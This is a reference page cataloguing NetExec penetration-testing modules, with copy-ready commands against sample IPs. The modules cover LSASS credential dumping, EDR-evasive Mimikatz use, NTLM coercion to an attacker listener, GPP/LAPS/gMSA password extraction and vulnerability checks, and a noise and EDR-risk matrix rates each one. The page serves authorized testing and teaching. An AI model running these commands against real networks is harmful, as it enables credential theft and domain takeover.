NetExec Modules Reference
#Overview
NetExec's modular architecture allows community-contributed attack modules to run against targets. Each module is protocol-specific and provides automated attack capabilities — from credential dumping to vulnerability scanning. This reference catalogs all key built-in modules with their protocol, purpose, OPSEC risk, and usage.
#Module Discovery
# List all available modules for a protocol
netexec smb -L
# Shows: module name, description, author
# List modules for other protocols
netexec ldap -L
netexec winrm -L
netexec mssql -L
netexec ssh -L
# Get detailed options for a specific module
netexec smb -M lsassy --options
# Shows: configurable parameters, default values, descriptions
BASH
#Module Usage Pattern
netexec <protocol> <target> -u <user> -p <pass> -M <module_name> [-o KEY=VALUE]
# -M <module> -> module name (case-sensitive)
# -o KEY=VALUE -> module options (comma-separated for multiple)
BASH
#SMB Modules
#lsassy — Remote LSASS Credential Dump
| Attribute | Value |
|---|---|
| Purpose | Remotely dump LSASS process memory and extract credentials |
| Privilege | Local Administrator |
| Noise | High (LSASS access, EDR trigger) |
| Output | Plaintext passwords, NTLM hashes, Kerberos tickets from LSASS |
netexec smb 10.10.10.5 -u admin -p pass -M lsassy
netexec smb 10.10.10.5 -u admin -p pass -M lsassy -o METHOD=2 # dumpert method
BASH
#spider_plus — Recursive Share Crawler
| Attribute | Value |
|---|---|
| Purpose | Recursively list and download files from accessible shares |
| Privilege | Any valid credential with share read access |
| Noise | Medium (high SMB file listing traffic) |
| Output | File listings, downloaded files matching patterns |
netexec smb 10.10.10.5 -u user -p pass -M spider_plus
netexec smb 10.10.10.5 -u user -p pass -M spider_plus -o PATTERN='*.kdbx,*.xml,*.config,*.ps1'
BASH
#scuffy — SMB Signing Check
| Attribute | Value |
|---|---|
| Purpose | Check SMB signing status (identify relay targets) |
| Privilege | None (unauthenticated) |
| Noise | Low (SMB negotiation) |
| Output | signing:True or signing:False per target |
netexec smb 10.10.10.0/24 -u '' -p '' -M scuffy
BASH
#wcc — WebClient (WebDAV) Check
| Attribute | Value |
|---|---|
| Purpose | Check if WebClient service is running (coercion prerequisite) |
| Privilege | None (unauthenticated) |
| Noise | Low |
| Output | WebClient:Running or WebClient:Stopped per target |
netexec smb 10.10.10.0/24 -u '' -p '' -M wcc
BASH
#bloodhound — BloodHound Collector (SMB)
| Attribute | Value |
|---|---|
| Purpose | Collect BloodHound data via SMB (requires SharpHound on target) |
| Privilege | Valid domain credentials |
| Noise | High (binary execution on target) |
| Output | BloodHound JSON files |
netexec smb 10.10.10.5 -u user -p pass -M bloodhound -o COLLECTION_METHOD='All'
BASH
#nanodump — LSASS Dump Variant
| Attribute | Value |
|---|---|
| Purpose | PowerShell-based LSASS dump (alternative to lsassy) |
| Privilege | Local Administrator |
| Noise | Medium (PowerShell execution) |
| Output | LSASS minidump |
netexec smb 10.10.10.5 -u admin -p pass -M nanodump
BASH
#handlekatz — Mimikatz via Handle Duplication
| Attribute | Value |
|---|---|
| Purpose | Execute Mimikatz using handle duplication (bypasses some EDR) |
| Privilege | Local Administrator |
| Noise | High |
| Output | LSASS credentials |
netexec smb 10.10.10.5 -u admin -p pass -M handlekatz
BASH
#nopac — CVE-2021-42278/42287 Check
| Attribute | Value |
|---|---|
| Purpose | Check for noPac vulnerability (samAccountName spoofing) |
| Privilege | Valid domain credentials |
| Noise | Medium (machine account creation) |
| Output | Vulnerable/Not Vulnerable |
netexec smb 10.10.10.5 -u user -p pass -M nopac
BASH
#petitpotam — Coerce Authentication
| Attribute | Value |
|---|---|
| Purpose | Coerce target to authenticate to attacker (EFSRPC method) |
| Privilege | None (unauthenticated) |
| Noise | Medium |
| Output | Incoming NTLM authentication to specified listener |
netexec smb 10.10.10.5 -u '' -p '' -M petitpotam -o LISTENER=10.10.14.5
BASH
#dfscoerce — DFS Coerce Authentication
| Attribute | Value |
|---|---|
| Purpose | Coerce authentication via DFS-RPC (NetrDfsRemoveStdRoot) |
| Privilege | None (unauthenticated) |
| Noise | Medium |
| Output | Incoming NTLM authentication |
netexec smb 10.10.10.5 -u '' -p '' -M dfscoerce -o LISTENER=10.10.14.5
BASH
#shadowcoerce — Shadow Copy Coerce
| Attribute | Value |
|---|---|
| Purpose | Coerce authentication via FSRVP (Shadow Copy RPC) |
| Privilege | Valid domain credentials |
| Noise | Medium |
| Output | Incoming NTLM authentication |
netexec smb 10.10.10.5 -u user -p pass -M shadowcoerce -o LISTENER=10.10.14.5
BASH
#zerologon — CVE-2020-1472 Check
| Attribute | Value |
|---|---|
| Purpose | Check for ZeroLogon vulnerability (Netlogon bypass) |
| Privilege | None (unauthenticated) |
| Noise | Low (single RPC call) |
| Output | Vulnerable/Patched |
netexec smb 10.10.10.5 -u '' -p '' -M zerologon
BASH
#gpp_password — Group Policy Preferences Password Extraction
| Attribute | Value |
|---|---|
| Purpose | Find and decrypt GPP passwords from SYSVOL shares |
| Privilege | Any authenticated domain user |
| Noise | Low (SMB file read) |
| Output | Plaintext passwords from GPP XML files |
netexec smb 10.10.10.5 -u user -p pass -M gpp_password
BASH
#gpp_autologin — GPP Auto-Logon Credentials
| Attribute | Value |
|---|---|
| Purpose | Extract auto-logon credentials from GPP |
| Privilege | Any authenticated domain user |
| Noise | Low |
| Output | Auto-logon username/password |
netexec smb 10.10.10.5 -u user -p pass -M gpp_autologin
BASH
#enum_av — Antivirus Enumeration
| Attribute | Value |
|---|---|
| Purpose | Enumerate installed AV/EDR products |
| Privilege | Valid credentials with WMI access |
| Noise | Low |
| Output | AV product name, version, status |
netexec smb 10.10.10.5 -u user -p pass -M enum_av
BASH
#enum_dns — DNS Enumeration
| Attribute | Value |
|---|---|
| Purpose | Enumerate DNS records via SMB/RPC |
| Privilege | Valid domain credentials |
| Noise | Low |
| Output | DNS zones, records |
netexec smb 10.10.10.5 -u user -p pass -M enum_dns
BASH
#LDAP Modules
#adcs — ADCS Enumeration
| Attribute | Value |
|---|---|
| Purpose | Enumerate ADCS infrastructure and vulnerable templates |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP reads) |
| Output | CA servers, templates, ESC1–ESC15 vulnerability flags |
netexec ldap 10.10.10.5 -u user -p pass -M adcs
BASH
#laps — LAPS Password Enumeration
| Attribute | Value |
|---|---|
| Purpose | Enumerate LAPS-managed computers and read passwords |
| Privilege | Domain user (read requires LAPS reader permission) |
| Noise | Low (LDAP reads) |
| Output | Computer list with LAPS status, passwords (if authorized) |
netexec ldap 10.10.10.5 -u user -p pass -M laps
netexec ldap 10.10.10.5 -u laps_reader -p pass -M laps -o READ=true
BASH
#delegation — Delegation Enumeration
| Attribute | Value |
|---|---|
| Purpose | Enumerate all delegation types (unconstrained, constrained, RBCD) |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP reads) |
| Output | Computers/users with delegation configured, delegation type |
netexec ldap 10.10.10.5 -u user -p pass -M delegation
BASH
#bloodhound — BloodHound Collector (LDAP)
| Attribute | Value |
|---|---|
| Purpose | Collect BloodHound data via LDAP (no on-target execution) |
| Privilege | Any authenticated domain user |
| Noise | Medium (high-volume LDAP queries) |
| Output | BloodHound-compatible JSON files |
netexec ldap 10.10.10.5 -u user -p pass -M bloodhound
netexec ldap 10.10.10.5 -u user -p pass -M bloodhound -o COLLECTION_METHOD='ACL,Group,Trusts'
BASH
#gmsa — gMSA Password Read
| Attribute | Value |
|---|---|
| Purpose | Read gMSA managed passwords |
| Privilege | Domain user with gMSA read permission |
| Noise | Low (LDAP read) |
| Output | gMSA account NTLM hash |
netexec ldap 10.10.10.5 -u user -p pass -M gmsa
BASH
#maq — Machine Account Quota
| Attribute | Value |
|---|---|
| Purpose | Check Machine Account Quota (for RBCD attacks) |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP read) |
| Output | MAQ value (default: 10) |
netexec ldap 10.10.10.5 -u user -p pass -M maq
BASH
#subnet — Subnet Enumeration
| Attribute | Value |
|---|---|
| Purpose | Enumerate AD Sites and Services subnets |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP reads) |
| Output | Subnet definitions, site associations |
netexec ldap 10.10.10.5 -u user -p pass -M subnet
BASH
#trusts — Domain Trust Enumeration
| Attribute | Value |
|---|---|
| Purpose | Enumerate domain and forest trusts |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP reads) |
| Output | Trusted domains, trust direction, SID filtering status |
netexec ldap 10.10.10.5 -u user -p pass -M trusts
BASH
#user-desc — User Description Password Search
| Attribute | Value |
|---|---|
| Purpose | Search user description fields for passwords |
| Privilege | Any authenticated domain user |
| Noise | Low (LDAP reads) |
| Output | Users with passwords in description field |
netexec ldap 10.10.10.5 -u user -p pass -M user-desc
BASH
#get-desc-users — Get Users with Specific Description
| Attribute | Value |
|---|---|
| Purpose | Search for users by description keyword |
| Privilege | Any authenticated domain user |
| Noise | Low |
| Output | Users matching description filter |
netexec ldap 10.10.10.5 -u user -p pass -M get-desc-users -o KEYWORD='admin'
BASH
#group-mem — Group Membership Enumeration
| Attribute | Value |
|---|---|
| Purpose | Enumerate members of specific groups |
| Privilege | Any authenticated domain user |
| Noise | Low |
| Output | Group members |
netexec ldap 10.10.10.5 -u user -p pass -M group-mem -o GROUP='Domain Admins'
BASH
#MSSQL Modules
#mssql_priv — Privilege Check
| Attribute | Value |
|---|---|
| Purpose | Check SQL user privilege level (sysadmin, db_owner, etc.) |
| Privilege | Valid SQL credentials |
| Noise | Low (SQL queries) |
| Output | sysadmin:True/False, db_owner roles |
netexec mssql 10.10.10.5 -u sa -p pass -M mssql_priv
BASH
#mssql_linked_servers — Linked Server Enumeration
| Attribute | Value |
|---|---|
| Purpose | Enumerate linked SQL servers (trust relationships) |
| Privilege | Valid SQL credentials |
| Noise | Low (SQL queries) |
| Output | Linked server names, connection strings |
netexec mssql 10.10.10.5 -u sa -p pass -M mssql_linked_servers
BASH
#RDP Modules
#rdp_screenshot — Screenshot Capture
| Attribute | Value |
|---|---|
| Purpose | Capture screenshot of active RDP session |
| Privilege | Valid RDP credentials |
| Noise | Medium (brief RDP connection) |
| Output | PNG screenshot |
netexec rdp 10.10.10.5 -u user -p pass -M rdp_screenshot
BASH
#VNC Modules
#vnc_screenshot — Screenshot Capture
| Attribute | Value |
|---|---|
| Purpose | Capture screenshot of VNC session |
| Privilege | Valid VNC password |
| Noise | Low |
| Output | PNG screenshot |
netexec vnc 10.10.10.5 -u '' -p pass -M vnc_screenshot
BASH
#SSH Modules
#sudo_check — Sudo Privilege Check
| Attribute | Value |
|---|---|
| Purpose | Check sudo privileges for authenticated user |
| Privilege | Valid SSH credentials |
| Noise | Low (single command execution) |
| Output | sudo -l output |
netexec ssh 10.10.10.5 -u user -p pass -M sudo_check
BASH
#Module Risk Matrix
| Module | Protocol | Privilege Required | Noise | EDR Risk |
|---|---|---|---|---|
| scuffy | SMB | None | Low | None |
| wcc | SMB | None | Low | None |
| zerologon | SMB | None | Low | None |
| petitpotam | SMB | None | Medium | Low |
| dfscoerce | SMB | None | Medium | Low |
| gpp_password | SMB | Domain User | Low | None |
| spider_plus | SMB | Domain User | Medium | Low |
| enum_av | SMB | Domain User | Low | Low |
| adcs | LDAP | Domain User | Low | None |
| laps | LDAP | Domain User | Low | None |
| delegation | LDAP | Domain User | Low | None |
| bloodhound | LDAP | Domain User | Medium | Low |
| maq | LDAP | Domain User | Low | None |
| user-desc | LDAP | Domain User | Low | None |
| mssql_priv | MSSQL | SQL Login | Low | None |
| sudo_check | SSH | SSH User | Low | None |
| rdp_screenshot | RDP | RDP User | Medium | Low |
| shadowcoerce | SMB | Domain User | Medium | Medium |
| nopac | SMB | Domain User | Medium | Medium |
| bloodhound | SMB | Domain User | High | High |
| lsassy | SMB | Local Admin | High | Very High |
| nanodump | SMB | Local Admin | Medium | High |
| handlekatz | SMB | Local Admin | High | Very High |
#Writing Custom Modules
NetExec modules are Python classes that inherit from a base module class. They receive the protocol connection context and can execute arbitrary operations.
# Minimal module skeleton
from nxc.modules.base import BaseModule
class Module(BaseModule):
name = "example"
description = "Example custom module"
supported_protocols = ["smb"]
opsec_safe = True # Low noise
multiple_hosts = True # Can run against multiple targets
def options(self, context, module_options):
"""Define module options"""
pass
def on_login(self, context, connection):
"""Execute when valid credentials are provided"""
pass
def on_request(self, context, request):
"""Execute on every request (even without credentials)"""
pass
PYTHON
Module files are placed in ~/.netexec/modules/ or the NetExec installation modules directory.
#Cross-References
- SMB Operations — SMB protocol usage
- LDAP Operations — LDAP protocol usage
- AD Attacks via NetExec — Modules in attack chains
- Credential Dumping — lsassy and related modules